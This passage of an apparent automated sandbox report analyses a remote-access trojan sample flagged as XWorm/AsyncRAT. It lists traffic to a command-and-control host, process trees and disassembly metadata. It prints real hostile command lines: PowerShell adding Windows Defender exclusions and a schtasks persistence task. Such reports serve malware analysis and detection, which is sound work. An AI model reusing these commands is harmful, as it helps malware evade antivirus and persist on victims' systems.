                                                                        Jan 1, 2025 21:57:57.378163099 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:57:57.436935902 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:57:57.441768885 CET5652649739147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:10.950298071 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:10.955180883 CET5652649739147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:18.798691988 CET5652649739147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:18.798769951 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:19.178847075 CET4973956526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:19.184801102 CET5652649739147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:19.189126015 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:19.193993092 CET5652649874147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:19.194089890 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:19.225292921 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:19.230084896 CET5652649874147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:28.169974089 CET8049730208.95.112.1192.168.2.4
                                                                        Jan 1, 2025 21:58:28.170025110 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:58:31.835076094 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:31.839859009 CET5652649874147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:40.602258921 CET4973080192.168.2.4208.95.112.1
                                                                        Jan 1, 2025 21:58:40.607531071 CET8049730208.95.112.1192.168.2.4
                                                                        Jan 1, 2025 21:58:40.621666908 CET5652649874147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:40.621803045 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:41.850461006 CET4987456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:41.852844954 CET5000456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:41.855324984 CET5652649874147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:41.857652903 CET5652650004147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:41.857737064 CET5000456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:41.884224892 CET5000456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:41.889094114 CET5652650004147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:53.444463968 CET5000456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:53.449291945 CET5652650004147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:58:59.772552967 CET5000456526192.168.2.4147.185.221.24
                                                                        Jan 1, 2025 21:58:59.777415037 CET5652650004147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:59:03.222951889 CET5652650004147.185.221.24192.168.2.4
                                                                        Jan 1, 2025 21:59:03.225347996 CET5000456526192.168.2.4147.185.221.24

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 1, 2025 21:57:00.117916107 CET5788353192.168.2.41.1.1.1
                                                                        Jan 1, 2025 21:57:00.125581026 CET53578831.1.1.1192.168.2.4
                                                                        Jan 1, 2025 21:57:57.335666895 CET6387753192.168.2.41.1.1.1
                                                                        Jan 1, 2025 21:57:57.368580103 CET53638771.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 1, 2025 21:57:00.117916107 CET192.168.2.41.1.1.10x7f70Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                        Jan 1, 2025 21:57:57.335666895 CET192.168.2.41.1.1.10x34f0Standard query (0)pro-favorite.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 1, 2025 21:57:00.125581026 CET1.1.1.1192.168.2.40x7f70No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                        Jan 1, 2025 21:57:57.368580103 CET1.1.1.1192.168.2.40x34f0No error (0)pro-favorite.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449730208.95.112.1806936C:\Users\user\Desktop\ANuh30XoVu.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 1, 2025 21:57:00.137609005 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Jan 1, 2025 21:57:00.592973948 CET175INHTTP/1.1 200 OK
                                                                        Date: Wed, 01 Jan 2025 20:56:59 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:56:55
                                                                        Start date:01/01/2025
                                                                        Path:C:\Users\user\Desktop\ANuh30XoVu.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\ANuh30XoVu.exe"
                                                                        Imagebase:0xf30000
                                                                        File size:67'584 bytes
                                                                        MD5 hash:C0D9A8B29B80A47CBD0963F5DC1A8266
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:1
                                                                        Start time:15:57:00
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:57:00
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:15:57:06
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ANuh30XoVu.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:57:06
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:15:57:16
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:15:57:16
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:15:57:31
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
                                                                        Imagebase:0x7ff70f330000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:15:57:31
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:15:57:53
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
                                                                        Imagebase:0x7ff76f990000
                                                                        File size:235'008 bytes
                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:15:57:53
                                                                        Start date:01/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:15:57:54
                                                                        Start date:01/01/2025
                                                                        Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Imagebase:0x920000
                                                                        File size:67'584 bytes
                                                                        MD5 hash:C0D9A8B29B80A47CBD0963F5DC1A8266
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Sekoia.io
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 76%, ReversingLabs
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:15:58:01
                                                                        Start date:01/01/2025
                                                                        Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Imagebase:0x150000
                                                                        File size:67'584 bytes
                                                                        MD5 hash:C0D9A8B29B80A47CBD0963F5DC1A8266
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:15:59:00
                                                                        Start date:01/01/2025
                                                                        Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        Imagebase:0xc30000
                                                                        File size:67'584 bytes
                                                                        MD5 hash:C0D9A8B29B80A47CBD0963F5DC1A8266
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:20.5%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:33.3%
                                                                          Total number of Nodes:9
                                                                          Total number of Limit Nodes:0

                                                                          Executed Functions

                                                                          Function 00007FFD9B775EF6 Relevance: 3.0, Strings: 2, Instructions: 493COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 7ffd9b775ef6-7ffd9b775f03 1 7ffd9b775f0e-7ffd9b775f3a 0->1 2 7ffd9b775f05-7ffd9b775f0d 0->2 3 7ffd9b775f3c-7ffd9b775fd7 1->3 4 7ffd9b775ed7 1->4 2->1 10 7ffd9b776043 3->10 11 7ffd9b775fd9-7ffd9b775fe2 3->11 5 7ffd9b775ee2-7ffd9b775ef3 4->5 6 7ffd9b775ed9-7ffd9b775eda 4->6 6->5 13 7ffd9b776045-7ffd9b77606a 10->13 11->10 12 7ffd9b775fe4-7ffd9b775ff0 11->12 14 7ffd9b775ff2-7ffd9b776004 12->14 15 7ffd9b776029-7ffd9b776041 12->15 20 7ffd9b77606c-7ffd9b776075 13->20 21 7ffd9b7760d6 13->21 16 7ffd9b776008-7ffd9b77601b 14->16 17 7ffd9b776006 14->17 15->13 16->16 19 7ffd9b77601d-7ffd9b776025 16->19 17->16 19->15 20->21 23 7ffd9b776077-7ffd9b776083 20->23 22 7ffd9b7760d8-7ffd9b776180 21->22 34 7ffd9b776182-7ffd9b77618c 22->34 35 7ffd9b7761ee 22->35 24 7ffd9b7760bc-7ffd9b7760d4 23->24 25 7ffd9b776085-7ffd9b776097 23->25 24->22 27 7ffd9b77609b-7ffd9b7760ae 25->27 28 7ffd9b776099 25->28 27->27 29 7ffd9b7760b0-7ffd9b7760b8 27->29 28->27 29->24 34->35 37 7ffd9b77618e-7ffd9b77619b 34->37 36 7ffd9b7761f0-7ffd9b776219 35->36 44 7ffd9b776283 36->44 45 7ffd9b77621b-7ffd9b776226 36->45 38 7ffd9b7761d4-7ffd9b7761ec 37->38 39 7ffd9b77619d-7ffd9b7761af 37->39 38->36 40 7ffd9b7761b3-7ffd9b7761c6 39->40 41 7ffd9b7761b1 39->41 40->40 43 7ffd9b7761c8-7ffd9b7761d0 40->43 41->40 43->38 46 7ffd9b776285-7ffd9b776316 44->46 45->44 47 7ffd9b776228-7ffd9b776236 45->47 55 7ffd9b77631c-7ffd9b77632b 46->55 48 7ffd9b77626f-7ffd9b776281 47->48 49 7ffd9b776238-7ffd9b77624a 47->49 48->46 51 7ffd9b77624e-7ffd9b776261 49->51 52 7ffd9b77624c 49->52 51->51 53 7ffd9b776263-7ffd9b77626b 51->53 52->51 53->48 56 7ffd9b776333-7ffd9b776398 call 7ffd9b7763b4 55->56 57 7ffd9b77632d 55->57 64 7ffd9b77639f-7ffd9b7763b3 56->64 65 7ffd9b77639a 56->65 57->56 65->64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %|$%|
                                                                          • API String ID: 0-3601463633
                                                                          • Opcode ID: 7d196ba0fab20a498fbc29f2d196b6ef453f5a801a76f92261acb6947e14c854
                                                                          • Instruction ID: 5e8513e3128182c6f53bd400c382bf8eca7e91fb7b4db985531b4453496101d0
                                                                          • Opcode Fuzzy Hash: 7d196ba0fab20a498fbc29f2d196b6ef453f5a801a76f92261acb6947e14c854
                                                                          • Instruction Fuzzy Hash: 75F1B430A09A4D4FEBA8DF28C895BE977D1FF54310F04426AE85DC72A5DF78E9418B81
                                                                          Function 00007FFD9B776CA2 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 66 7ffd9b776ca2-7ffd9b776caf 67 7ffd9b776cb1-7ffd9b776cb9 66->67 68 7ffd9b776cba-7ffd9b776ce9 66->68 67->68 69 7ffd9b776cec-7ffd9b776d87 68->69 70 7ffd9b776c87-7ffd9b776c9c 68->70 75 7ffd9b776df3 69->75 76 7ffd9b776d89-7ffd9b776d92 69->76 78 7ffd9b776df5-7ffd9b776e1a 75->78 76->75 77 7ffd9b776d94-7ffd9b776da0 76->77 79 7ffd9b776da2-7ffd9b776db4 77->79 80 7ffd9b776dd9-7ffd9b776df1 77->80 85 7ffd9b776e1c-7ffd9b776e25 78->85 86 7ffd9b776e86 78->86 81 7ffd9b776db8-7ffd9b776dcb 79->81 82 7ffd9b776db6 79->82 80->78 81->81 84 7ffd9b776dcd-7ffd9b776dd5 81->84 82->81 84->80 85->86 88 7ffd9b776e27-7ffd9b776e33 85->88 87 7ffd9b776e88-7ffd9b776ead 86->87 94 7ffd9b776eaf-7ffd9b776eb9 87->94 95 7ffd9b776f1b 87->95 89 7ffd9b776e6c-7ffd9b776e84 88->89 90 7ffd9b776e35-7ffd9b776e47 88->90 89->87 92 7ffd9b776e4b-7ffd9b776e5e 90->92 93 7ffd9b776e49 90->93 92->92 96 7ffd9b776e60-7ffd9b776e68 92->96 93->92 94->95 97 7ffd9b776ebb-7ffd9b776ec8 94->97 98 7ffd9b776f1d-7ffd9b776f4b 95->98 96->89 99 7ffd9b776f01-7ffd9b776f19 97->99 100 7ffd9b776eca-7ffd9b776edc 97->100 104 7ffd9b776f4d-7ffd9b776f58 98->104 105 7ffd9b776fbb 98->105 99->98 101 7ffd9b776ee0-7ffd9b776ef3 100->101 102 7ffd9b776ede 100->102 101->101 106 7ffd9b776ef5-7ffd9b776efd 101->106 102->101 104->105 107 7ffd9b776f5a-7ffd9b776f68 104->107 108 7ffd9b776fbd-7ffd9b777095 105->108 106->99 109 7ffd9b776fa1-7ffd9b776fb9 107->109 110 7ffd9b776f6a-7ffd9b776f7c 107->110 118 7ffd9b77709b-7ffd9b7770aa 108->118 109->108 111 7ffd9b776f80-7ffd9b776f93 110->111 112 7ffd9b776f7e 110->112 111->111 114 7ffd9b776f95-7ffd9b776f9d 111->114 112->111 114->109 119 7ffd9b7770b2-7ffd9b777114 call 7ffd9b777130 118->119 120 7ffd9b7770ac 118->120 127 7ffd9b77711b-7ffd9b77712f 119->127 128 7ffd9b777116 119->128 120->119 128->127
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %|$%|
                                                                          • API String ID: 0-3601463633
                                                                          • Opcode ID: 31640ae78d2776b18a1e1218023712087839519964a73f48c0707b27c23e1352
                                                                          • Instruction ID: 789ec32de41dfe4eba77a18ea99950efe2ef1f96ddd9e564597fb31fbcb44113
                                                                          • Opcode Fuzzy Hash: 31640ae78d2776b18a1e1218023712087839519964a73f48c0707b27c23e1352
                                                                          • Instruction Fuzzy Hash: 0AE1C430A09A4E8FEBA8DF28D8A57E977D1FB54310F04436ED84DC72A5DE78E9418781
                                                                          Function 00007FFD9B7774A1 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 198 7ffd9b7774a1-7ffd9b77755d CheckRemoteDebuggerPresent 202 7ffd9b77755f 198->202 203 7ffd9b777565-7ffd9b7775a8 198->203 202->203
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 35b201b72ba284030ced6034c6bc0b54ef31043a5c0162ff0f73b913ee306682
                                                                          • Instruction ID: 654a57e70109f05e342942ddba39ae35d08ace54b81ce44ed9aa6f2e3d69483a
                                                                          • Opcode Fuzzy Hash: 35b201b72ba284030ced6034c6bc0b54ef31043a5c0162ff0f73b913ee306682
                                                                          • Instruction Fuzzy Hash: 9531023190875C8FCB58DF58C88A7E97BE0FF65311F0542ABD489D7292DB34A846CB91
                                                                          Function 00007FFD9B771DB1 Relevance: .4, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 57de9ab67ebe145d8c4bb7ec49a6a7a4f5bdc3921e07ccde2b5dc44ae03b4f83
                                                                          • Instruction ID: 23648d948a73acebf0ca6e40c9b5d3c6be2388fe4d541a7277c971ffffa31309
                                                                          • Opcode Fuzzy Hash: 57de9ab67ebe145d8c4bb7ec49a6a7a4f5bdc3921e07ccde2b5dc44ae03b4f83
                                                                          • Instruction Fuzzy Hash: CDC1F731B2EA4D4FEB94EB7884B567C76D2FF99305F050279D05DC32E2DE68A9028741
                                                                          Function 00007FFD9B771B2D Relevance: .2, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e9330ae354244d8bf1d5a411a04bd4565d1b4112db2033b0a4d6d493468d831
                                                                          • Instruction ID: 529c5b8af760ad4a40171d4bc87429098fc8b303899f2c317e810ea8ec349a29
                                                                          • Opcode Fuzzy Hash: 9e9330ae354244d8bf1d5a411a04bd4565d1b4112db2033b0a4d6d493468d831
                                                                          • Instruction Fuzzy Hash: 1B51FC20B1E6C94FD79AAB7848B46657FE5DF87219B0801FBE089C76E7ED485806C342
                                                                          Function 00007FFD9B77920D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 169 7ffd9b77920d-7ffd9b7792f0 RtlSetProcessIsCritical 173 7ffd9b7792f2 169->173 174 7ffd9b7792f8-7ffd9b77932d 169->174 173->174
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: 24f5560cd743dd7a7749871c10803bcf6371322b574b28ad0116c95420f5dc8c
                                                                          • Instruction ID: aa000eed2cb161951f880fa5eacc70e155f368f243a328a1e55bedaa5e7556f8
                                                                          • Opcode Fuzzy Hash: 24f5560cd743dd7a7749871c10803bcf6371322b574b28ad0116c95420f5dc8c
                                                                          • Instruction Fuzzy Hash: 3641123190C7488FDB18DF98D885AE9BBF0FF56311F04416EE09AC3692CB74A846CB91
                                                                          Function 00007FFD9B779738 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 176 7ffd9b779738-7ffd9b77973f 177 7ffd9b779741-7ffd9b779749 176->177 178 7ffd9b77974a-7ffd9b7797bd 176->178 177->178 182 7ffd9b7797c3-7ffd9b7797d0 178->182 183 7ffd9b779849-7ffd9b77984d 178->183 184 7ffd9b7797d2-7ffd9b77980f SetWindowsHookExW 182->184 183->184 186 7ffd9b779811 184->186 187 7ffd9b779817-7ffd9b779848 184->187 186->187
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_ANuh30XoVu.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: acd1234573695870e62b9da8c353e55cee761740eaaa655b2ea74e430aaf0bac
                                                                          • Instruction ID: 0f0a19569afa75b7704ba20acc183756224508e29592463b74a6c890f048ca9a
                                                                          • Opcode Fuzzy Hash: acd1234573695870e62b9da8c353e55cee761740eaaa655b2ea74e430aaf0bac
                                                                          • Instruction Fuzzy Hash: 9D41F630A1CA4C5FDB18DF68985A6F9BBE1EB59311F00427ED05DD32A2CE65A812C7C1
                                                                          Function 00007FFD9B7788D4 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 190 7ffd9b7788d4-7ffd9b77928a 194 7ffd9b779292-7ffd9b7792f0 RtlSetProcessIsCritical 190->194 195 7ffd9b7792f2 194->195 196 7ffd9b7792f8-7ffd9b77932d 194->196 195->196
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2947176527.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
